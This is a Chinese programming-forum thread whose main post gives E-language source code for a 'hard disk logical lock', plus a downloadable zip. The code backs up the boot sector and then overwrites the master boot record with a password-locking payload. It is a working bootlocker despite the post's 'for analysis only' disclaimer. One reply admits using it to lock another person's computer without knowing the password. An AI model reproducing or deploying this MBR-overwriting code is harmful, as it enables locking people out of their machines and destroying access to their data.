查看: 4562|回复: 7

[易语言] 易语言硬盘逻辑锁源代码 仅供分析请勿用于非法

[复制链接]

110

主题

111

帖子

337

积分

中级会员

Rank: 3Rank: 3

积分
337
发表于 2018-8-22 13:55:21 | 显示全部楼层 |阅读模式
易语言硬盘逻辑锁源代码 仅供分析请勿用于非法
  1. .版本 2
  2. .支持库 spec
  3. .支持库 dp1

  4. .子程序 物理硬盘_新版, 逻辑型, , 作者:无名版权所有
  5. .参数 密码, 文本型, , 不能是中文,全角,你见过这样的密码吗?长度为18
  6. .参数 自定义显示信息, 字节集, 可空, 开机显示的文字!
  7. .参数 返回的错误, 文本型, 参考
  8. .局部变量 字节集密码, 字节集
  9. .局部变量 处理, 字节集
  10. .局部变量 byte, 字节型
  11. .局部变量 old, 字节集
  12. .局部变量 old_md5, 字节集
  13. .局部变量 处理_md5, 字节集
  14. .局部变量 数据块, 字节集
  15. .局部变量 绝对偏移, 整数型
  16. .局部变量 填充字节集, 字节集

  17. 字节集密码 = 到字节集 (密码)
  18. .如果真 (字节集密码 = { 0 })
  19.     返回的错误 = “密码不可以为空的!!”
  20.     返回 (假)
  21. .如果真结束
  22. .如果真 (取字节集长度 (字节集密码) ≥ 18)
  23.     返回的错误 = “密码不能超过18位!!!!!”
  24.     返回 (假)
  25. .如果真结束
  26. .如果真 (是否为空 (自定义显示信息))
  27.     自定义显示信息 = { 66, 121, 58, 32, 78, 84, 83, 69, 67, 32, 45, 32, 76, 71, 32, 80, 97, 115, 115, 119, 111, 114, 100, 32, 119, 111, 115, 104, 105, 120, 105, 97, 111, 120, 117, 101, 115, 104, 101, 110, 103 }
  28. .如果真结束
  29. 填充字节集 = _字节集_取空白 (18 - 取字节集长度 (字节集密码))
  30. 数据块 = 到字节集 (到字节 (取字节集长度 (字节集密码)))
  31. 数据块 = 数据块 + 字节集密码 + 填充字节集
  32. 数据块 = 数据块 + { 0 }
  33. 数据块 = 数据块 + 自定义显示信息 + { 0 }
  34. 调试输出 (数据块)
  35. 处理 = #新版锁芯
  36. 绝对偏移 = 取变量数据地址 (处理)
  37. 绝对偏移 = 绝对偏移 + #LockData
  38. 写字节集 (绝对偏移, 数据块, 取字节集长度 (数据块))
  39. old = 读硬盘扇区 (0, 1)
  40. .如果真 (old = { 0 })
  41.     返回的错误 = “读取原来引导扇区失败!!”
  42.     返回 (假)
  43. .如果真结束
  44. old_md5 = 取字节集左边 (old, 10)
  45. 处理_md5 = 取字节集左边 (处理, 10)
  46. .如果真 (取数据摘要 (old_md5) = 取数据摘要 (处理_md5))
  47.     返回的错误 = “你的硬盘已经加锁,请重启计算机生效!!!”
  48.     返回 (假)
  49. .如果真结束
  50. 写硬盘扇区 (old, 2, 1)  ' 备份
  51. 写硬盘扇区 (处理, 0, 1)  ' 写入
  52. 返回的错误 = “加锁完毕!”
  53. 返回 (真)
复制代码

易语言硬盘逻辑锁源代码 仅供分析请勿用于非法

易语言硬盘逻辑锁源代码 仅供分析请勿用于非法

易语言硬盘逻辑锁源代码 仅供分析请勿用于非法

易语言硬盘逻辑锁源代码 仅供分析请勿用于非法

易语言硬盘逻辑锁源码.zip

56.8 KB, 下载次数: 120

回复

使用道具 举报

0

主题

2081

帖子

4224

积分

论坛元老

Rank: 8Rank: 8

积分
4224
发表于 2018-10-15 11:12:12 | 显示全部楼层
酷似你祖宗.
回复

使用道具 举报

0

主题

1742

帖子

3524

积分

论坛元老

Rank: 8Rank: 8

积分
3524
发表于 2018-10-28 15:42:01 | 显示全部楼层
﹄既然没有了以后,何必再记住曾经。﹃
回复

使用道具 举报

0

主题

3287

帖子

6610

积分

论坛元老

Rank: 8Rank: 8

积分
6610
发表于 2018-12-7 20:02:18 | 显示全部楼层
这个世界,没有偶然。
回复

使用道具 举报

0

主题

3120

帖子

6273

积分

论坛元老

Rank: 8Rank: 8

积分
6273
发表于 2018-12-24 13:22:34 | 显示全部楼层
愿你此生明朗,做人低调有梦想。
回复

使用道具 举报

0

主题

3120

帖子

6273

积分

论坛元老

Rank: 8Rank: 8

积分
6273
发表于 2018-12-24 13:22:55 | 显示全部楼层
别想以后有多难,想想以后有多甜。
回复

使用道具 举报

0

主题

4

帖子

12

积分

新手上路

Rank: 1

积分
12
发表于 2020-3-7 22:22:31 | 显示全部楼层
我用这个源码给别人机子锁了  谁知道密码啊我找不到
回复

使用道具 举报

0

主题

4

帖子

12

积分

新手上路

Rank: 1

积分
12
发表于 2020-6-26 18:20:19 | 显示全部楼层
自定义密码在哪里修改?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表